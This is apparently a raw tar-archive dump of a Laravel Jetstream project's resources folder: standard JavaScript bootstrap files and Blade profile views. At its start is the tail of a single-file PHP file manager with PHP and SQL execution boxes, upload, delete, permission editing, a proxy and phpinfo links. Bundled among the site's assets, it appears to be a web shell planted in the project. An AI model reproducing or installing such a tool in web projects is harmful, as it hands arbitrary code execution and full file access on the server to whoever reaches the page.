if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } �����������������������������������������������������������������������������������������������������������������������������������������������������js/index.php����������������������������������������������������������������������������������������0000644�����������������00000000000�14765366572�0007013 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������js/app.js�������������������������������������������������������������������������������������������0000644�����������������00000000233�14765366572�0006321 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������import './bootstrap'; import Alpine from 'alpinejs'; import focus from '@alpinejs/focus'; window.Alpine = Alpine; Alpine.plugin(focus); Alpine.start(); ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������js/bootstrap.js�������������������������������������������������������������������������������������0000644�����������������00000002340�14765366572�0007557 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������/** * We'll load the axios HTTP library which allows us to easily issue requests * to our Laravel back-end. This library automatically handles sending the * CSRF token as a header based on the value of the "XSRF" token cookie. */ import axios from 'axios'; window.axios = axios; window.axios.defaults.headers.common['X-Requested-With'] = 'XMLHttpRequest'; /** * Echo exposes an expressive API for subscribing to channels and listening * for events that are broadcast by Laravel. Echo and event broadcasting * allows your team to easily build robust real-time web applications. */ // import Echo from 'laravel-echo'; // import Pusher from 'pusher-js'; // window.Pusher = Pusher; // window.Echo = new Echo({ // broadcaster: 'pusher', // key: import.meta.env.VITE_PUSHER_APP_KEY, // cluster: import.meta.env.VITE_PUSHER_APP_CLUSTER ?? 'mt1', // wsHost: import.meta.env.VITE_PUSHER_HOST ? import.meta.env.VITE_PUSHER_HOST : `ws-${import.meta.env.VITE_PUSHER_APP_CLUSTER}.pusher.com`, // wsPort: import.meta.env.VITE_PUSHER_PORT ?? 80, // wssPort: import.meta.env.VITE_PUSHER_PORT ?? 443, // forceTLS: (import.meta.env.VITE_PUSHER_SCHEME ?? 'https') === 'https', // enabledTransports: ['ws', 'wss'], // }); ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/profile/delete-user-form.blade.php������������������������������������������������������������0000644�����������������00000004415�14765366572�0014330 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-action-section> <x-slot name="title"> {{ __('Delete Account') }} </x-slot> <x-slot name="description"> {{ __('Permanently delete your account.') }} </x-slot> <x-slot name="content"> <div class="max-w-xl text-sm text-gray-600"> {{ __('Once your account is deleted, all of its resources and data will be permanently deleted. Before deleting your account, please download any data or information that you wish to retain.') }} </div> <div class="mt-5"> <x-danger-button wire:click="confirmUserDeletion" wire:loading.attr="disabled"> {{ __('Delete Account') }} </x-danger-button> </div> <!-- Delete User Confirmation Modal --> <x-dialog-modal wire:model="confirmingUserDeletion"> <x-slot name="title"> {{ __('Delete Account') }} </x-slot> <x-slot name="content"> {{ __('Are you sure you want to delete your account? Once your account is deleted, all of its resources and data will be permanently deleted. Please enter your password to confirm you would like to permanently delete your account.') }} <div class="mt-4" x-data="{}" x-on:confirming-delete-user.window="setTimeout(() => $refs.password.focus(), 250)"> <x-input type="password" class="mt-1 block w-3/4" autocomplete="current-password" placeholder="{{ __('Password') }}" x-ref="password" wire:model.defer="password" wire:keydown.enter="deleteUser" /> <x-input-error for="password" class="mt-2" /> </div> </x-slot> <x-slot name="footer"> <x-secondary-button wire:click="$toggle('confirmingUserDeletion')" wire:loading.attr="disabled"> {{ __('Cancel') }} </x-secondary-button> <x-danger-button class="ml-3" wire:click="deleteUser" wire:loading.attr="disabled"> {{ __('Delete Account') }} </x-danger-button> </x-slot> </x-dialog-modal> </x-slot> </x-action-section> ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/profile/update-profile-information-form.blade.php���������������������������������������������0000644�����������������00000010311�14765366572�0017345 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-form-section submit="updateProfileInformation"> <x-slot name="title"> {{ __('Profile Information') }} </x-slot> <x-slot name="description"> {{ __('Update your account\'s profile information and email address.') }} </x-slot> <x-slot name="form"> <!-- Profile Photo --> @if (Laravel\Jetstream\Jetstream::managesProfilePhotos()) <div x-data="{photoName: null, photoPreview: null}" class="col-span-6 sm:col-span-4"> <!-- Profile Photo File Input --> <input type="file" class="hidden" wire:model="photo" x-ref="photo" x-on:change=" photoName = $refs.photo.files[0].name; const reader = new FileReader(); reader.onload = (e) => { photoPreview = e.target.result; }; reader.readAsDataURL($refs.photo.files[0]); " /> <x-label for="photo" value="{{ __('Photo') }}" /> <!-- Current Profile Photo --> <div class="mt-2" x-show="! photoPreview"> <img src="{{ $this->user->profile_photo_url }}" alt="{{ $this->user->name }}" class="rounded-full h-20 w-20 object-cover"> </div> <!-- New Profile Photo Preview --> <div class="mt-2" x-show="photoPreview" style="display: none;"> <span class="block rounded-full w-20 h-20 bg-cover bg-no-repeat bg-center" x-bind:style="'background-image: url(\'' + photoPreview + '\');'"> </span> </div> <x-secondary-button class="mt-2 mr-2" type="button" x-on:click.prevent="$refs.photo.click()"> {{ __('Select A New Photo') }} </x-secondary-button> @if ($this->user->profile_photo_path) <x-secondary-button type="button" class="mt-2" wire:click="deleteProfilePhoto"> {{ __('Remove Photo') }} </x-secondary-button> @endif <x-input-error for="photo" class="mt-2" /> </div> @endif <!-- Name --> <div class="col-span-6 sm:col-span-4"> <x-label for="name" value="{{ __('Name') }}" /> <x-input id="name" type="text" class="mt-1 block w-full" wire:model.defer="state.name" autocomplete="name" /> <x-input-error for="name" class="mt-2" /> </div> <!-- Email --> <div class="col-span-6 sm:col-span-4"> <x-label for="email" value="{{ __('Email') }}" /> <x-input id="email" type="email" class="mt-1 block w-full" wire:model.defer="state.email" autocomplete="username" /> <x-input-error for="email" class="mt-2" /> @if (Laravel\Fortify\Features::enabled(Laravel\Fortify\Features::emailVerification()) && ! $this->user->hasVerifiedEmail()) <p class="text-sm mt-2"> {{ __('Your email address is unverified.') }} <button type="button" class="underline text-sm text-gray-600 hover:text-gray-900 rounded-md focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500" wire:click.prevent="sendEmailVerification"> {{ __('Click here to re-send the verification email.') }} </button> </p> @if ($this->verificationLinkSent) <p v-show="verificationLinkSent" class="mt-2 font-medium text-sm text-green-600"> {{ __('A new verification link has been sent to your email address.') }} </p> @endif @endif </div> </x-slot> <x-slot name="actions"> <x-action-message class="mr-3" on="saved"> {{ __('Saved.') }} </x-action-message> <x-button wire:loading.attr="disabled" wire:target="photo"> {{ __('Save') }} </x-button> </x-slot> </x-form-section> �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/profile/show.blade.php������������������������������������������������������������������������0000644�����������������00000002637�14765366572�0012135 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-app-layout> <x-slot name="header"> <h2 class="font-semibold text-xl text-gray-800 leading-tight"> {{ __('Profile') }} </h2> </x-slot> <div> <div class="max-w-7xl mx-auto py-10 sm:px-6 lg:px-8"> @if (Laravel\Fortify\Features::canUpdateProfileInformation()) @livewire('profile.update-profile-information-form') <x-section-border /> @endif @if (Laravel\Fortify\Features::enabled(Laravel\Fortify\Features::updatePasswords())) <div class="mt-10 sm:mt-0"> @livewire('profile.update-password-form') </div> <x-section-border /> @endif @if (Laravel\Fortify\Features::canManageTwoFactorAuthentication()) <div class="mt-10 sm:mt-0"> @livewire('profile.two-factor-authentication-form') </div> <x-section-border /> @endif <div class="mt-10 sm:mt-0"> @livewire('profile.logout-other-browser-sessions-form') </div> @if (Laravel\Jetstream\Jetstream::hasAccountDeletionFeatures()) <x-section-border /> <div class="mt-10 sm:mt-0"> @livewire('profile.delete-user-form') </div> @endif </div> </div> </x-app-layout> �������������������������������������������������������������������������������������������������views/profile/update-password-form.blade.php��������������������������������������������������������0000644�����������������00000003141�14765366572�0015227 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-form-section submit="updatePassword"> <x-slot name="title"> {{ __('Update Password') }} </x-slot> <x-slot name="description"> {{ __('Ensure your account is using a long, random password to stay secure.') }} </x-slot> <x-slot name="form"> <div class="col-span-6 sm:col-span-4"> <x-label for="current_password" value="{{ __('Current Password') }}" /> <x-input id="current_password" type="password" class="mt-1 block w-full" wire:model.defer="state.current_password" autocomplete="current-password" /> <x-input-error for="current_password" class="mt-2" /> </div> <div class="col-span-6 sm:col-span-4"> <x-label for="password" value="{{ __('New Password') }}" /> <x-input id="password" type="password" class="mt-1 block w-full" wire:model.defer="state.password" autocomplete="new-password" /> <x-input-error for="password" class="mt-2" /> </div> <div class="col-span-6 sm:col-span-4"> <x-label for="password_confirmation" value="{{ __('Confirm Password') }}" /> <x-input id="password_confirmation" type="password" class="mt-1 block w-full" wire:model.defer="state.password_confirmation" autocomplete="new-password" /> <x-input-error for="password_confirmation" class="mt-2" /> </div> </x-slot> <x-slot name="actions"> <x-action-message class="mr-3" on="saved"> {{ __('Saved.') }} </x-action-message> <x-button> {{ __('Save') }} </x-button> </x-slot> </x-form-section> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/profile/logout-other-browser-sessions-form.blade.php������������������������������������������0000644�����������������00000012011�14765366572�0020056 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<x-action-section> <x-slot name="title"> {{ __('Browser Sessions') }} </x-slot> <x-slot name="description"> {{ __('Manage and log out your active sessions on other browsers and devices.') }} 